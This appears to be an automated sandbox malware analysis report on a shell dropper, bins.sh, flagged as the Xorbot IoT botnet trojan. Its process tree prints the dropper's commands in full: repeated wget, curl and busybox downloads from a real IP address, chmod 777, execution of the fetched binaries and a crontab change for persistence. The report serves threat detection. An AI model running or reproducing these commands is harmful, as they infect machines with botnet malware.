Overview

overview

10

Static

static

1

bins.sh

ubuntu-18.04-amd64

10

bins.sh

debian-9-armhf

10

bins.sh

debian-9-mips

10

bins.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    12/12/2024, 00:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    8e91a79fc4643d1043539fbf479773de

  • SHA1

    c263691d4c03a21a2ecd42e3851c01f7e63f96a4

  • SHA256

    25bff07e80ec30f4adc57ac056e6853ad4e01fe0e565c546d9798e20ca112640

  • SHA512

    18fe143818c303acba1c37d4da2df6de7eb87c7be51ed023251d3fc88ed085a47e3e38f062ceafa26614e197718b76f2c6e682095ca9dcf25b2b520205a1d44a

  • SSDEEP

    192:/jCQURJoMZ4QBGb7/uTjDsoMZ4Qvn7/uTjiQUH:/jCQURJoMZ4QBGb7/uTjIoMZ4QP7/uTi

Score
10/10
xorbotbotnetdefense_evasiondiscoveryexecutionpersistenceprivilege_escalatiotrojan

Malware Config

Signatures

  • Detects Xorbot 5 IoCs
    botnettrojan
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

    botnettrojanxorbot
  • Xorbot family
    xorbot
  • Contacts a large (2005) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 64 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 15 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:1498
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:1499
        • /usr/bin/wget
          wget http://216.126.231.164/bins/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • Writes file to tmp directory
          PID:1500
        • /usr/bin/curl
          curl -O http://216.126.231.164/bins/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • Writes file to tmp directory
          PID:1504
        • /bin/busybox
          /bin/busybox wget http://216.126.231.164/bins/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • Writes file to tmp directory
          PID:1506
        • /bin/chmod
          chmod 777 woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • File and Directory Permissions Modification
          PID:1507
        • /tmp/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          ./woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
          • Executes dropped EXE
          PID:1508
        • /bin/rm
          rm woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
          2⤵
            PID:1510
          • /usr/bin/wget
            wget http://216.126.231.164/bins/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • Writes file to tmp directory
            PID:1511
          • /usr/bin/curl
            curl -O http://216.126.231.164/bins/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • Writes file to tmp directory
            PID:1512
          • /bin/busybox
            /bin/busybox wget http://216.126.231.164/bins/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • Writes file to tmp directory
            PID:1513
          • /bin/chmod
            chmod 777 ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • File and Directory Permissions Modification
            PID:1514
          • /tmp/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            ./ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
            • Executes dropped EXE
            PID:1515
          • /bin/rm
            rm ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
            2⤵
              PID:1517
            • /usr/bin/wget
              wget http://216.126.231.164/bins/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • Writes file to tmp directory
              PID:1518
            • /usr/bin/curl
              curl -O http://216.126.231.164/bins/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • Writes file to tmp directory
              PID:1519
            • /bin/busybox
              /bin/busybox wget http://216.126.231.164/bins/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • Writes file to tmp directory
              PID:1520
            • /bin/chmod
              chmod 777 zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • File and Directory Permissions Modification
              PID:1521
            • /tmp/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              ./zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
              • Executes dropped EXE
              PID:1522
            • /bin/rm
              rm zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
              2⤵
                PID:1524
              • /usr/bin/wget
                wget http://216.126.231.164/bins/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • Writes file to tmp directory
                PID:1525
              • /usr/bin/curl
                curl -O http://216.126.231.164/bins/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • Writes file to tmp directory
                PID:1526
              • /bin/busybox
                /bin/busybox wget http://216.126.231.164/bins/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • Writes file to tmp directory
                PID:1527
              • /bin/chmod
                chmod 777 a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • File and Directory Permissions Modification
                PID:1528
              • /tmp/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                ./a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                • Executes dropped EXE
                PID:1529
              • /bin/rm
                rm a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                2⤵
                  PID:1531
                • /usr/bin/wget
                  wget http://216.126.231.164/bins/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:1532
                • /usr/bin/curl
                  curl -O http://216.126.231.164/bins/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:1533
                • /bin/busybox
                  /bin/busybox wget http://216.126.231.164/bins/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • System Network Configuration Discovery
                  • Writes file to tmp directory
                  PID:1534
                • /bin/chmod
                  chmod 777 E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1535
                • /tmp/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  ./E16KuOPcUiplct7MpSkszujHELGuWSszA2
                  2⤵
                  • Executes dropped EXE
                  • Renames itself
                  • Reads runtime system information
                  • System Network Configuration Discovery
                  PID:1536
                  • /bin/sh
                    sh -c "crontab -l"
                    3⤵
                      PID:1538
                      • /usr/bin/crontab
                        crontab -l
                        4⤵
                          PID:1539
                      • /bin/sh
                        sh -c "crontab -"
                        3⤵
                          PID:1540
                          • /usr/bin/crontab
                            crontab -
                            4⤵
                            • Creates/modifies Cron job
                            PID:1541
                      • /bin/rm
                        rm E16KuOPcUiplct7MpSkszujHELGuWSszA2
                        2⤵
                        • System Network Configuration Discovery
                        PID:1543
                      • /usr/bin/wget
                        wget http://216.126.231.164/bins/wBQq9SauqB5qBpNrsdtctSpVqNxtXMP5nT
                        2⤵
                          PID:1546

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • /tmp/E16KuOPcUiplct7MpSkszujHELGuWSszA2
                        Filesize

                        98KB

                        MD5

                        5141342d0df8699fa32a6b066a0c592e

                        SHA1

                        8157673225bd5182f16215e2aa823a25ca2d4fbc

                        SHA256

                        54302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d

                        SHA512

                        d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801

                        Download Submit

                      • /tmp/a834O3eKIHmRwcfCKPHv5LOaFMNcP1vvmv
                        Filesize

                        107KB

                        MD5

                        eb9c3a0de91fcf16ba17cb24608df68c

                        SHA1

                        09d95a7d70d5e115d103be51edff7c498d272fac

                        SHA256

                        dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

                        SHA512

                        9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

                        Download Submit

                      • /tmp/woz0LFXHZjW50O6XboV3WyVp3hPbgH54fX
                        Filesize

                        141KB

                        MD5

                        3ca8decdb1e52c423c521bfff02ac200

                        SHA1

                        8621ecd6807109b8541912ad9e134f6fb49bfd48

                        SHA256

                        dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f

                        SHA512

                        b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a

                        Download Submit

                      • /tmp/ypC7J2PVHhmdH54tZdZPvLkmRHWTitt0z9
                        Filesize

                        119KB

                        MD5

                        1b166b95f9cb4b079ef1b9ec8363ddf3

                        SHA1

                        0d8eb08add467b3b5474f9b25909297fe7c2839c

                        SHA256

                        94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                        SHA512

                        983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                        Download Submit

                      • /tmp/zjJXZdqX1FsoyStbwo43MWdhVs8Ui4l38U
                        Filesize

                        122KB

                        MD5

                        cd3d4b9c643e5b473fb4d88ed05f0716

                        SHA1

                        64ee7a97418583d759eaea8000890cc3bae1b5f4

                        SHA256

                        0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                        SHA512

                        164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                        Download Submit

                      • /var/spool/cron/crontabs/tmp.40Luav
                        Filesize

                        210B

                        MD5

                        3f9a908792125ae6967804780fc720c8

                        SHA1

                        3232dba3d08ceffb1566165fbff4c133bda968c9

                        SHA256

                        04f43cfd42b9f908f59d03cad37a7242d5fe7671790e276ab0d006ec5d8e5e45

                        SHA512

                        251dd565229e96788d451b62446df95e2838155f2080ab94348024e83f16f1281638ad66e74c651e3b0090aa5d38c7bba5fce979cc077a8bbd4714975c849c79

                        Download Submit